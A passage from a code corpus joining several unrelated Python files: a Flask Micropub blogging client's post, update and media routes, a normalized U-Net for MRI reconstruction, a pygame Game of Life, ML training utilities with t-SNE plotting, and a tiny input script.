            elif request.form["action"] == "undelete":
                # The token must carry the "undelete" scope.
                if session.get("scope") and not "undelete" in session.get("scope").split(" "):
                    flash("You do not have permission to undelete posts.")
                    return redirect("/")
                http_request = requests.post(
                    ENDPOINT_URL,
                    json={
                        "type": ["h-entry"],
                        "action": "undelete",
                        "url": url
                    },
                    headers={
                        "Authorization": f"Bearer {user}"
                    }
                )
                if http_request.status_code == 200 or http_request.status_code == 201:
                    flash(f"Your {url} post was successfully undeleted.")
                else:
                    flash(http_request.json()["message"].strip("."))
                return render_template(
                    "user/dashboard.html",
                    user=user,
                    me=me,
                    title="WriteIt Home",
                    action="undelete"
                )
            return redirect("/")
        abort(403)
    if user is not None:
        return render_template(
            "user/dashboard.html",
            user=user,
            me=me,
            title="WriteIt Dashboard",
            action=None
        )
    else:
        return render_template(
            "index.html",
            user=user,
            me=me,
            title="Home WriteIt",
            action=None
        )
@client.route("/post", methods=["GET", "POST"])
def create_post():
    """Render the post-composition form and submit new Micropub posts.

    GET shows the editor for ``?type=`` (like, repost, bookmark, rsvp,
    reply, checkin, photo, watch) and, for reply contexts, fetches the
    target's h-entry.  POST builds a Micropub JSON (or form-encoded)
    payload and forwards it to ENDPOINT_URL with the user's bearer token.

    NOTE(review): if ``?type=`` matches no accepted post type, ``title``
    and ``url`` are never assigned and the final render_template raises
    NameError — confirm and initialize them up front.
    """
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        return redirect("/login")
    post_type = request.args.get("type")
    request_type = None
    # (form slug, Micropub property name) pairs; empty property means the
    # post type has no single target-URL property.
    # NOTE(review): ("checkin", "") appears twice — presumably a copy-paste
    # duplicate; harmless but worth removing.
    accepted_post_types = (
        ("like", "like-of"),
        ("repost", "repost-of"),
        ("bookmark", "bookmark-of"),
        ("rsvp", "rsvp"),
        ("reply", "in-reply-to"),
        ("checkin", ""),
        ("checkin", ""),
        ("photo", ""),
        ("watch", "")
    )
    for item in accepted_post_types:
        post, attribute = item
        if post_type == post:
            title = f"Create a {post.title()} Post"
            url = request.args.get(attribute)
            request_type = attribute
    # Photo uploads require the "media" scope on the token.
    if post_type == "photo" and "media" not in session.get("scope").split(" "):
        flash("You need to grant the 'media' scope to upload photos.")
        return redirect("/")
    if request.method == "POST":
        form_encoded = request.form.to_dict()
        # Never forward the user's token as post content.
        if form_encoded.get("access_token"):
            del form_encoded["access_token"]
        # Preview requests re-enter this view with the target URL in the
        # query string instead of creating the post.
        if request.form.get("preview") and not request.form.get("in-reply-to"):
            post_type = None
            if request.form.get("like-of"):
                return redirect(f"/post?type=like&like-of={request.form.get('like-of')}&is_previewing=true")
            if request.form.get("bookmark-of"):
                return redirect(f"/post?type=bookmark&bookmark-of={request.form.get('bookmark-of')}&is_previewing=true")
            if request.form.get("repost-of"):
                return redirect(f"/post?type=repost&repost-of={request.form.get('repost-of')}&is_previewing=true")
        if me and user:
            data = {
                "type": ["h-entry"],
                "properties": {}
            }
            form_types = ["in-reply-to", "like-of", "repost-of", "bookmark-of", "watch-of"]
            # NOTE(review): this assumes "h" and "action" keys are present in
            # the form — del raises KeyError otherwise; confirm the templates
            # always send them.
            for key in form_encoded:
                if key in form_types:
                    del form_encoded["h"]
                    del form_encoded["action"]
                    data["properties"][key] = [form_encoded]
                    url = form_encoded[key]
                    request_type = key
                    break
            if request.form.get("syndication") and request.form.get("syndication") != "none":
                data["syndication"] = [request.form.get("syndication")]
            if request.form.get("category") == "RSVP":
                data["p-rsvp"] = {}
                data["p-rsvp"]["properties"] = {
                    "event_name": request.form.get("event_name"),
                    "in-reply-to": request.form.get("in-reply-to"),
                    "state": request.form.get("state"),
                    "content": [request.form.get("content")],
                    "event_date": request.form.get("event_date"),
                    "event_time": request.form.get("event_time")
                }
            elif request.form.get("venue_name"):
                # NOTE(review): the first assignment is immediately overwritten
                # by the second — dead code.
                data["properties"] = {"checkin": [{"properties": {}}]}
                data["properties"] = {
                    "checkin": [
                        {
                            "properties": {
                                "name": request.form.get("venue_name"),
                                "latitude": request.form.get("latitude"),
                                "longitude": request.form.get("longitude")
                            }
                        }
                    ]
                }
                if request.form.get("content"):
                    data["properties"]["checkin"][0]["properties"]["content"] = [request.form.get("content")]
                if not request.form.get("venue_name") or not request.form.get("latitude") or not request.form.get("longitude"):
                    flash("Please enter a valid venue name, latitude, and longitude value.")
                    return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
            else:
                if request.form.get("title"):
                    data["properties"]["title"] = [request.form.get("title")]
                if request.form.get("content"):
                    data["properties"]["content"] = [request.form.get("content")]
                if request.form.get("category"):
                    data["properties"]["category"] = request.form.get("category").split(", ")
                if request.form.get("is_hidden"):
                    data["properties"]["is_hidden"] = [request.form.get("is_hidden")]
                # HTML-looking content is wrapped in {"html": ...} per Micropub.
                if request.form.get("content") and BeautifulSoup(request.form.get("content"), "lxml") and BeautifulSoup(request.form.get("content"), "lxml").find():
                    data["properties"]["content"] = [{"html": request.form.get("content")}]
                elif request.form.get("content") and request.form.get("content") is not None:
                    data["properties"]["content"] = [request.form.get("content")]
            photo = request.files.get("photo")
            if photo:
                photo.save(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)))
                # if session.get("config"):
                # photo_r = requests.post(session["config"]["media-endpoint"], files={"file": (secure_filename(photo.filename),open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"), 'image/jpeg')}, headers={"Authorization": "Bearer " + user})
                # else:
                # NOTE(review): this open() handle is never closed — leaks a
                # file descriptor per upload; wrap in a with-statement.
                photo_http_request = requests.post(
                    MEDIA_ENDPOINT_URL,
                    files={
                        "file": (
                            secure_filename(photo.filename),
                            open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"),
                            'image/jpeg'
                        )
                    },
                    headers={
                        "Authorization": "Bearer " + user
                    }
                )
            check_for_alt_text = False
            if photo:
                data["properties"]["photo"] = [{ "value": photo_http_request.headers["Location"] }]
                check_for_alt_text = True
            if check_for_alt_text and request.form.get("image_alt_text"):
                data["properties"]["photo"][0]["alt"] = request.form.get("image_alt_text")
            if request.form.get("format") == "form_encoded":
                form_encoded["h"] = "entry"
                categories = []
                if form_encoded.get("category") and len(form_encoded.get("category").split(", ")) > 0:
                    for i in form_encoded.get("category").replace(", ", ",").split(","):
                        categories += [i]
                    form_encoded["category[]"] = categories
                http_request = requests.post(ENDPOINT_URL, data=form_encoded, headers={"Authorization": f"Bearer {user}"})
            else:
                http_request = requests.post(ENDPOINT_URL, json=data, headers={"Authorization": f"Bearer {user}"})
            try:
                response = http_request.json()["message"]
            except:
                response = http_request.text
            if http_request.status_code != 200 and http_request.status_code != 201:
                flash("Error: " + str(response))
            if http_request.headers.get("Location"):
                return redirect(http_request.headers["Location"])
            flash("Your post was successfully created.")
            title = "Create Post"
            return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
        return jsonify({"error": "You must be logged in to create a post."}), 401
    # GET with a target URL: fetch reply context for the editor preview.
    if request_type is not None and url:
        site_supports_webmention, h_entry = indieweb_utils.get_reply_context(url, twitter_bearer_token=TWITTER_BEARER_TOKEN)
    else:
        h_entry = None
        site_supports_webmention = False
    is_previewing = False
    if request.args.get("is_previewing") and request.args.get("is_previewing") == "true":
        is_previewing = True
    return render_template(
        "post/create_post.html",
        title=title,
        post_type=post_type,
        user=user,
        me=me,
        url=url,
        h_entry=h_entry,
        site_supports_webmention=site_supports_webmention,
        is_previewing=is_previewing
    )
@client.route("/update", methods=["GET", "POST"])
def update_post():
    """Edit an existing post identified by ``?url=``.

    GET fetches the post's source properties from the Micropub endpoint
    and renders the edit form; POST sends a Micropub "update" action with
    the replacement properties, requiring the "update" token scope.

    Fixes: the final render previously passed the builtin ``id`` instead
    of the post URL (``id=id`` -> ``id=post_id``); the unknown-error flash
    message was garbled by a bad rename ("errohttp_request."); the 401
    message said "create" instead of "update"; bare ``except:`` narrowed
    to ``except Exception:``.
    """
    post_id = request.args.get("url")
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        return redirect("/login")
    # Updating requires the "update" scope on the token.
    if session.get("scope") and not "update" in session.get("scope").split(" "):
        flash("You do not have permission to update posts.")
        return redirect("/")
    # Infer the editor variant from the post's URL path.
    if "/checkin/" in post_id:
        post_type = "checkin"
    elif "/rsvp/" in post_id:
        post_type = "rsvp"
    elif "/webmentions/" in post_id:
        post_type = "reply"
    else:
        post_type = "note"
    try:
        properties = requests.get(ENDPOINT_URL + "?q=source&url=" + post_id,
            headers={"Authorization": f"Bearer {user}"})
        properties = properties.json()
    except Exception:
        abort(404)
    title = "Update a Post"
    if request.method == "POST":
        if me and user:
            data = {
                "action": "update",
                "url": post_id,
                "replace": {}
            }
            if request.form.get("title"):
                data["replace"]["title"] = [request.form.get("title")]
            else:
                data["replace"]["title"] = ""
            if request.form.get("content"):
                data["replace"]["content"] = [request.form.get("content")]
            else:
                data["replace"]["content"] = []
            if request.form.get("image_alt_text"):
                data["replace"]["image_alt_text"] = request.form.get("image_alt_text")
            else:
                data["replace"]["image_alt_text"] = ""
            if request.form.get("category"):
                data["replace"]["category"] = request.form.get("category")
            if request.form.get("is_hidden"):
                data["replace"]["is_hidden"] = [request.form.get("is_hidden")]
            if post_type == "rsvp":
                data["p-rsvp"] = {}
                data["p-rsvp"]["properties"] = {
                    "in-reply-to": properties["properties"]["in-reply-to"],
                    "rsvp": request.form.get("rsvp"),
                    "state": request.form.get("state"),
                    "content": [request.form.get("content")],
                    "event_date": request.form.get("event_date"),
                    "event_time": request.form.get("event_time")
                }
            elif request.form.get("in-reply-to"):
                data["in-reply-to"] = request.form.get("in-reply-to")
            http_request = requests.post(ENDPOINT_URL, json=data, headers={
                "Authorization": f"Bearer {user}", "Content-Type": "application/json"
            })
            try:
                response = http_request.json()
                if http_request.status_code != 200 and http_request.status_code != 201:
                    flash("Error: " + str(response["message"]))
                else:
                    return redirect(http_request.headers["Location"])
            except Exception:
                flash("There was an unknown server error.")
            return render_template(
                "post/update_post.html",
                title=title,
                post_type=post_type,
                user=user, me=me,
                id=post_id,
                properties=properties
            )
        return jsonify({"error": "You must be logged in to update a post."}), 401
    return render_template(
        "post/update_post.html",
        title=title,
        post_type=post_type,
        user=user, me=me,
        id=post_id,
        properties=properties
    )
@client.route("/settings")
def settings():
    """Show the account settings page for the signed-in user."""
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
        if session.get("syndication"):
            syndication = session["syndication"]
        else:
            syndication = None
    else:
        return redirect("/login")
    # NOTE(review): strip("/") removes slashes from BOTH ends of CLIENT_ID;
    # if only a trailing slash was intended, use rstrip("/") — confirm.
    client_id = CLIENT_ID.strip("/")
    return render_template(
        "user/settings.html",
        title="Settings",
        user=user,
        me=me,
        syndication=syndication,
        client_id=client_id
    )
@client.route("/schemas")
def schemas():
    """Show the schemas reference page; requires a signed-in user."""
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        return redirect("/login")
    return render_template(
        "user/schemas.html",
        title="Schemas",
        user=user,
        me=me
    )
# use this to forward client-side uploads from /post?type=photo to the /media micropub endpoint
@client.route("/media-forward", methods=["POST"])
def forward_media_query():
    """Proxy a browser photo upload to the Micropub media endpoint.

    Saves the uploaded file locally, forwards it with the user's bearer
    token, and redirects to the uploaded media's URL (or back to the
    photo form with a flash message on failure).

    Fixes: the local file handle passed to requests was never closed
    (descriptor leak) — now managed by a with-statement; a duplicate,
    unreachable access-token check was removed.
    """
    if not session.get("access_token"):
        return redirect("/login")
    photo = request.files.get("photo")
    if not photo:
        flash("No photo was uploaded. Please upload a photo and try again.")
        return redirect("/post?type=photo")
    # Prefer a caller-supplied filename; sanitize either way and strip
    # ".." to block path traversal.
    if request.form.get("filename"):
        filename = secure_filename(request.form.get("filename").replace("..", ""))
    else:
        filename = secure_filename(photo.filename.replace("..", ""))
    saved_path = os.path.join(UPLOAD_FOLDER, filename)
    photo.save(saved_path)
    with open(saved_path, "rb") as media_file:
        http_request = requests.post(
            MEDIA_ENDPOINT_URL,
            files={
                "file": (
                    filename,
                    media_file,
                    'image/jpeg'
                )
            },
            headers={
                "Authorization": f"Bearer {session['access_token']}"
            }
        )
    if http_request.status_code != 201:
        flash("Error: " + str(http_request.json()["message"]))
        return redirect("/post?type=photo")
    location_header = http_request.headers["Location"]
    return redirect(location_header)
@client.route("/robots.txt")
def robots():
    """Serve the static robots.txt from the blueprint's static folder."""
    return send_from_directory(client.static_folder, "robots.txt")
@client.route("/favicon.ico")
def favicon():
    """Serve the site favicon from the blueprint's static folder."""
    return send_from_directory(client.static_folder, "favicon.ico")
@client.route("/emojis.json")
def emojis():
    """Serve the emoji list used by the client-side autocomplete."""
    return send_from_directory(client.static_folder, "emojis.json")
@client.route("/manifest.json")
def web_app_manifest():
    """Serve the PWA web-app manifest."""
    return send_from_directory("static", "manifest.json")
@client.route("/emoji_autocomplete.js")
def emoji_autocomplete():
    """Serve the emoji autocomplete script."""
    return send_from_directory(client.static_folder, "js/emoji_autocomplete.js")
|
nilq/baby-python
|
python
|
"""Docstring for varnet.py
Normalized U-Net implemetnation for unrolled block network.
"""
import math
from typing import List, Tuple
import fastmri
import torch
import torch.nn as nn
import torch.nn.functional as F
from fastmri.data import transforms
from unet import MHUnet
from att_unet import AttUnet
class NormUnet(nn.Module):
    """PyTorch implementation of a Normalized U-Net model.
    This is the same as a regular U-Net, but with normalization applied to the
    input before the U-Net. This keeps the values more numerically stable
    during training.
    Initialization Parameters
    -------------------------
    chans : int
        Number of output channels of the first convolution layer.
    num_pools : int
        Number of down-sampling and up-sampling layers.
    in_chans : int
        Number of channels in the input to the U-Net model.
    out_chans : int
        Number of channels in the output to the U-Net model.
    drop_prob : float
        Dropout probability.
    which_unet : str
        One of [trueshare, mhushare, attenshare, split]
    task_count : int
        Number of dataset tasks
    Forward Parameters
    ------------------
    image : tensor
        4D tensor
    int_task : int
        i.e. 0 for div_coronal_pd_fs, 1 for div_coronal_pd
    Returns
    -------
    4D tensor
    References
    ----------
    https://github.com/facebookresearch/fastMRI/tree/master/fastmri/models
    """
    def __init__(
        self,
        chans: int,
        num_pools: int,
        in_chans: int = 2,
        out_chans: int = 2,
        drop_prob: float = 0.0,
        which_unet: str = 'user input required',
        task_count: int = None,
    ):
        super().__init__()
        assert which_unet in ['trueshare', 'mhushare', 'attenshare', 'split'], "variable which_unet not supported"
        # Shared/split variants use one decoder head; multi-head variants
        # get one decoder head per task.
        if which_unet == 'trueshare' or which_unet == 'split':
            decoder_heads = 1
        elif which_unet == 'mhushare' or which_unet == 'attenshare':
            assert task_count > 1, 'no. tasks must be int > 1 for mhu or att unet'
            decoder_heads = task_count
        # attentional network is a separate module
        if which_unet == 'attenshare':
            self.unet = AttUnet(
                in_chans = in_chans,
                out_chans = out_chans,
                chans = chans,
                num_pool_layers = num_pools,
                drop_prob = drop_prob,
                decoder_heads = decoder_heads,
            )
        # trueshare, mhushare, and split all use the same network
        # Differentiation between the three happens in MHUnet or VarNet_MTL
        else:
            self.unet = MHUnet(
                in_chans = in_chans,
                out_chans = out_chans,
                chans = chans,
                num_pool_layers = num_pools,
                drop_prob = drop_prob,
                decoder_heads = decoder_heads,
            )
    def complex_to_chan_dim(self, x: torch.Tensor) -> torch.Tensor:
        # (b, c, h, w, 2) complex-last -> (b, 2c, h, w): the two complex
        # components become the leading channel blocks.
        b, c, h, w, two = x.shape
        assert two == 2
        return x.permute(0, 4, 1, 2, 3).reshape(b, 2 * c, h, w)
    def chan_complex_to_last_dim(self, x: torch.Tensor) -> torch.Tensor:
        # Inverse of complex_to_chan_dim: (b, 2c, h, w) -> (b, c, h, w, 2).
        b, c2, h, w = x.shape
        assert c2 % 2 == 0
        c = c2 // 2
        return x.view(b, 2, c, h, w).permute(0, 2, 3, 4, 1).contiguous()
    def norm(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
        # group norm
        # Mean/std are computed over two groups (the real and imaginary
        # channel halves), then used to standardize x.
        # NOTE(review): mean/std have shape (b, 2) after the reduction, so
        # .view(b, c, 1, 1) only works when c == 2 (i.e. in_chans = 2 after
        # complex_to_chan_dim) — confirm for multi-coil inputs.
        b, c, h, w = x.shape
        x = x.view(b, 2, c // 2 * h * w)
        mean = x.mean(dim=2).view(b, c, 1, 1)
        std = x.std(dim=2).view(b, c, 1, 1)
        x = x.view(b, c, h, w)
        return (x - mean) / std, mean, std
    def unnorm(
        self, x: torch.Tensor, mean: torch.Tensor, std: torch.Tensor
    ) -> torch.Tensor:
        # Invert norm(): restore the original scale and offset.
        return x * std + mean
    def pad(
        self, x: torch.Tensor
    ) -> Tuple[torch.Tensor, Tuple[List[int], List[int], int, int]]:
        """Ensure that dimensions match after rounding errors incurred
        during upsampling/downsampling by padding.
        """
        _, _, h, w = x.shape
        # ((n - 1) | 15) + 1 rounds n up to the next multiple of 16.
        w_mult = ((w - 1) | 15) + 1
        h_mult = ((h - 1) | 15) + 1
        w_pad = [math.floor((w_mult - w) / 2), math.ceil((w_mult - w) / 2)]
        h_pad = [math.floor((h_mult - h) / 2), math.ceil((h_mult - h) / 2)]
        # TODO: fix this type when PyTorch fixes theirs
        # the documentation lies - this actually takes a list
        # https://github.com/pytorch/pytorch/blob/master/torch/nn/functional.py#L3457
        # https://github.com/pytorch/pytorch/pull/16949
        x = F.pad(x, w_pad + h_pad)
        return x, (h_pad, w_pad, h_mult, w_mult)
    def unpad(
        self,
        x: torch.Tensor,
        h_pad: List[int],
        w_pad: List[int],
        h_mult: int,
        w_mult: int,
    ) -> torch.Tensor:
        # Crop away the symmetric padding added by pad().
        return x[..., h_pad[0] : h_mult - h_pad[1], w_pad[0] : w_mult - w_pad[1]]
    def forward(
        self,
        x: torch.Tensor,
        int_task: int = 0,
    ) -> torch.Tensor:
        if not x.shape[-1] == 2:
            raise ValueError("Last dimension must be 2 for complex.")
        # get shapes for unet and normalize
        x = self.complex_to_chan_dim(x)
        x, mean, std = self.norm(x)
        x, pad_sizes = self.pad(x)
        x = self.unet(
            x, int_task = int_task,
        )
        # get shapes back and unnormalize
        x = self.unpad(x, *pad_sizes)
        x = self.unnorm(x, mean, std)
        x = self.chan_complex_to_last_dim(x)
        return x
|
nilq/baby-python
|
python
|
import pygame
import numpy as np
from time import sleep
class GameOfLife:
    """Conway's Game of Life rendered with pygame.

    Controls: Esc toggles pause; while paused, left-click toggles cells.
    The grid does not wrap — cells outside the board count as dead.
    """
    def __init__(self):
        pygame.init()
        self.size = 800  # window side length in pixels (square)
        self.divisions = 100  # grid cells per side
        self.length = self.size // self.divisions  # pixel size of one cell
        self.screen = pygame.display.set_mode((self.size, self.size))
        self.fps = 120
        self.interval = 10  # generations advanced per second (fps // interval frames apart)
        self.counter = 0  # frame counter used to pace generation updates
        self.color_bg = (25, 25, 25)
        self.color_fg = (230, 230, 230)
        # cells[i, j] is True when the cell at grid column i, row j is alive.
        self.cells = np.full((self.divisions, self.divisions), False, dtype=bool)
        self.paused = False
    def play(self):
        """Run the main loop: handle input, draw, and step generations."""
        clock = pygame.time.Clock()
        self.draw()
        pygame.display.update()
        while True:
            self.counter += 1
            clock.tick(self.fps)
            self.draw()
            pygame.display.update()
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    quit()
            keys = pygame.key.get_pressed()
            if keys[pygame.K_ESCAPE]:
                self.paused = not self.paused
                self.draw()
                pygame.display.update()
                # Crude debounce so one key press doesn't toggle repeatedly.
                sleep(0.2)
            if self.paused:
                # While paused, left-click toggles the cell under the cursor.
                if pygame.mouse.get_pressed()[0]:
                    pos = pygame.mouse.get_pos()
                    pos = [pos[0] // self.length, pos[1] // self.length]
                    self.cells[pos[0], pos[1]] = not self.cells[pos[0], pos[1]]
                continue
            # Advance one generation every (fps // interval) frames.
            if self.counter % (self.fps // self.interval) == 0:
                # Neighbor counts go into a grid padded by 1 on every side,
                # which avoids bounds checks at the borders (no wrap-around).
                neighbors_count = np.full((self.divisions + 2, self.divisions + 2), 0, dtype=np.int8)
                for i in range(self.divisions):
                    for j in range(self.divisions):
                        if self.cells[i, j]:
                            # Add this live cell to its 3x3 neighborhood ...
                            for i2 in range(i, i+3):
                                for j2 in range(j, j+3):
                                    neighbors_count[i2, j2] += 1
                            # ... then remove the self-count at its own slot.
                            neighbors_count[i+1, j+1] -= 1
                for i in range(self.divisions):
                    for j in range(self.divisions):
                        if self.cells[i, j]:
                            # Live cell survives only with 2 or 3 neighbors.
                            if neighbors_count[i+1, j+1] not in {2, 3}:
                                self.cells[i, j] = False
                        else:
                            # Dead cell with exactly 3 neighbors is born.
                            if neighbors_count[i+1, j+1] == 3:
                                self.cells[i, j] = True
    def draw(self):
        """Paint the background, then one foreground square per live cell."""
        pygame.draw.rect(
            self.screen,
            self.color_bg,
            pygame.Rect(0, 0, self.size, self.size)
        )
        for i in range(self.divisions):
            for j in range(self.divisions):
                if self.cells[i, j]:
                    pygame.draw.rect(
                        self.screen,
                        self.color_fg,
                        pygame.Rect(i * self.length, j * self.length, self.length, self.length)
                    )
# Launch the simulation when executed as a script.
if __name__ == "__main__":
    obj = GameOfLife()
    obj.play()
|
nilq/baby-python
|
python
|
import numpy as np
import torch
import torchvision
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from sklearn.manifold import TSNE
import os
from .model import resnet
from PIL import ImageFilter
import random
def adjust_learning_rate(args, optimizer, epoch, lr):
    """Step-decay the learning rate and write it into every param group.

    The base *lr* is multiplied by ``args.lr_decay_rate`` once for each
    milestone in ``args.lr_decay_epochs`` that *epoch* has already passed,
    then stored on all of *optimizer*'s parameter groups.
    """
    decay_steps = int(np.sum(epoch > np.asarray(args.lr_decay_epochs)))
    if decay_steps > 0:
        lr = lr * (args.lr_decay_rate ** decay_steps)
    for group in optimizer.param_groups:
        group['lr'] = lr
class AverageMeter(object):
    """Tracks the most recent value and a running (weighted) average."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Zero out all statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record *val* observed *n* times and refresh the running average."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
    """Computes the accuracy over the k top predictions for the specified values of k.

    Args:
        output: (batch, num_classes) score tensor.
        target: (batch,) ground-truth class indices.
        topk: iterable of k values to report.

    Returns:
        List of one-element tensors, the top-k accuracy in percent for each k.
    """
    with torch.no_grad():
        maxk = max(topk)
        batch_size = target.size(0)

        _, pred = output.topk(maxk, 1, True, True)
        pred = pred.t()
        correct = pred.eq(target.view(1, -1).expand_as(pred))

        res = []
        for k in topk:
            # reshape(-1) instead of view(-1): the sliced tensor is not
            # guaranteed contiguous, and view() raises in that case on
            # modern PyTorch (same fix as pytorch/examples#662).
            correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
            res.append(correct_k.mul_(100.0 / batch_size))
        return res
def ERG(arr, k=2):
    """Exclude the k columns/rows with the largest column sums, then pick
    the index with the largest remaining column sum.

    Args:
        arr: square 2-D similarity matrix (left unmodified; a copy is used).
        k: how many top-sum indices to zero out before re-ranking.

    Returns:
        (best_index, excluded_indices) where *excluded_indices* is the
        numpy array of the k removed indices (ascending by original sum).
    """
    work = arr.copy()
    excluded = np.argsort(work.sum(axis=0))[-k:]
    # Zero both the rows and the columns of every excluded index.
    work[excluded, :] = 0
    work[:, excluded] = 0
    return work.sum(axis=0).argmax(), excluded
def get_tsne_feature(model, loader, device, opt):
    """Run *model* over *loader* and collect features, labels and names.

    Returns (features, labels, room_names, image_names) as numpy arrays
    stacked over the whole loader, suitable for t-SNE plotting.
    """
    model.eval()
    with torch.no_grad():
        for idx, (image, label, room_name, image_name) in enumerate(loader):
            if torch.cuda.is_available():
                image = image.to(device)
                label = label.to(device)
            # Both modes currently unpack the model output identically.
            if opt.mode == 'label':
                feat, _ = model(image)
            elif opt.mode == 'self':
                feat, _ = model(image)
            feat = feat.detach().cpu().numpy()
            label = label.cpu().numpy()
            room_name = np.array(room_name)
            image_name = np.array(image_name)
            # Debug output: most "central" image by pairwise dot-product
            # similarity (assumes features are normalised — TODO confirm).
            sim = np.matmul(feat, feat.T)
            np.fill_diagonal(sim, 0)
            index = sim.sum(axis=0).argmax()
            new_index, ex = ERG(sim, 3)
            print(image_name[index], image_name[new_index])
            print(image_name[ex])
            # Accumulate batch results into growing arrays.
            if idx == 0:
                tsne_data = feat
                tsne_label = label
                tsne_room_name = room_name
                tsne_image_name = image_name
            else:
                tsne_data = np.concatenate((tsne_data, feat), axis=0)
                tsne_label = np.concatenate((tsne_label, label), axis=0)
                tsne_room_name = np.concatenate((tsne_room_name, room_name), axis=0)
                tsne_image_name = np.concatenate((tsne_image_name, image_name), axis=0)
    return tsne_data, tsne_label, tsne_room_name, tsne_image_name
def plot_tsne(data, label, room_name, image_name):
    """Project features to 2-D with t-SNE and scatter-plot two random rooms.

    Returns the projected points, image names, labels and room names for
    the two rooms that were plotted.
    """
    # NOTE: this local `cm` shadows the module-level `matplotlib.cm` import.
    cm = plt.get_cmap('gist_rainbow')
    NUM_COLORS = 2
    color = [cm(1. * i / NUM_COLORS) for i in range(NUM_COLORS)]
    tsne = TSNE(n_components=2, random_state=0)
    data = tsne.fit_transform(data)
    # room = ['FloorPlan26', 'FloorPlan227', 'FloorPlan328', 'FloorPlan429', 'FloorPlan30']
    kitchen_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30']
    living_room = ['FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230']
    bed_room = ['FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330']
    bath_room = ['FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
    # room = []
    # room.append(random.sample(kitchen_room, 1))
    # room.append(random.sample(living_room, 1))
    # room.append(random.sample(bed_room, 1))
    # room.append(random.sample(bath_room, 1))
    total_room = ['FloorPlan26', 'FloorPlan27', 'FloorPlan28', 'FloorPlan29', 'FloorPlan30', 'FloorPlan226', 'FloorPlan227', 'FloorPlan228', 'FloorPlan229', 'FloorPlan230', 'FloorPlan326', 'FloorPlan327', 'FloorPlan328', 'FloorPlan329', 'FloorPlan330', 'FloorPlan426', 'FloorPlan427', 'FloorPlan428', 'FloorPlan429', 'FloorPlan430']
    # Two rooms are chosen at random each call — output is nondeterministic.
    room = random.sample(total_room, 2)
    plt.figure(figsize=(12, 10))
    for i in range(2):
        # Collect the points belonging to the selected rooms.
        if i == 0:
            output_data = data[room_name==room[i]]
            output_label = label[room_name==room[i]]
            output_image_name = image_name[room_name==room[i]]
            output_room_name = room_name[room_name==room[i]]
        else:
            output_data = np.concatenate((output_data, data[room_name==room[i]]), axis=0)
            output_label = np.concatenate((output_label, label[room_name==room[i]]), axis=0)
            output_image_name = np.concatenate((output_image_name, image_name[room_name==room[i]]), axis=0)
            output_room_name = np.concatenate((output_room_name, room_name[room_name==room[i]]), axis=0)
        plt.scatter(data[room_name==room[i], 0], data[room_name==room[i], 1], marker='.', label=room[i], c=color[i])
    plt.legend()
    plt.show()
    return output_data, output_image_name, output_label, output_room_name
def save_model(model, optimizer, epoch, model_path):
    """Checkpoint model + optimizer state to <model_path>/best_model.pth,
    creating the directory if needed."""
    print('==> Saving...')
    if not os.path.exists(model_path):
        os.makedirs(model_path)
    checkpoint = {
        'model': model.state_dict(),
        'optimizer': optimizer.state_dict(),
        'epoch': epoch,
    }
    torch.save(checkpoint, os.path.join(model_path, "best_model.pth"))
def set_model(opt, device):
    """Build the backbone for opt.mode, optionally load weights, and move
    the model to *device* (DataParallel when several GPUs are visible)."""
    if opt.mode == 'label':
        model = resnet.resnet18(num_classes=4, opt=opt)
        # model = resnet.resnet50(num_classes=4, opt=opt)
    elif opt.mode == 'self':
        model = resnet.resnet50(opt=opt)
    if opt.pretrained == '':
        # pass
        if opt.mode == 'label':
            # pass
            # No checkpoint given: copy ImageNet weights layer by layer into
            # the project resnet (everything except the classifier head).
            pretrained_model = torchvision.models.resnet18(pretrained=True)
            # pretrained_model = torchvision.models.resnet50(pretrained=True)
            model.conv1.load_state_dict(pretrained_model.conv1.state_dict())
            model.bn1.load_state_dict(pretrained_model.bn1.state_dict())
            model.relu.load_state_dict(pretrained_model.relu.state_dict())
            model.maxpool.load_state_dict(pretrained_model.maxpool.state_dict())
            model.layer1.load_state_dict(pretrained_model.layer1.state_dict())
            model.layer2.load_state_dict(pretrained_model.layer2.state_dict())
            model.layer3.load_state_dict(pretrained_model.layer3.state_dict())
            model.layer4.load_state_dict(pretrained_model.layer4.state_dict())
            model.avgpool.load_state_dict(pretrained_model.avgpool.state_dict())
        else:
            pass
    else:
        # Resume from a project checkpoint; strict=False tolerates missing keys.
        checkpoint = torch.load(opt.pretrained)
        model.load_state_dict(checkpoint['model'], strict=False)
    if torch.cuda.is_available():
        if torch.cuda.device_count() > 1:
            print(torch.cuda.device_count(), 'Multi GPU running')
            model = torch.nn.DataParallel(model)
        model = model.to(device)
    return model
class GaussianBlur(object):
    """Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709"""

    def __init__(self, sigma=[.1, 2.]):
        # [min, max] range from which the blur radius is drawn per call.
        self.sigma = sigma

    def __call__(self, x):
        """Blur PIL image *x* with a radius sampled uniformly from the range."""
        low, high = self.sigma[0], self.sigma[1]
        radius = random.uniform(low, high)
        return x.filter(ImageFilter.GaussianBlur(radius=radius))
|
nilq/baby-python
|
python
|
x = int(input())
# Start from x+1 when x is even, from x itself when odd, then print four
# values spaced two apart (same sequence as the original branchy version).
y = x + 1 if x % 2 == 0 else x
for _ in range(4):
    print(y)
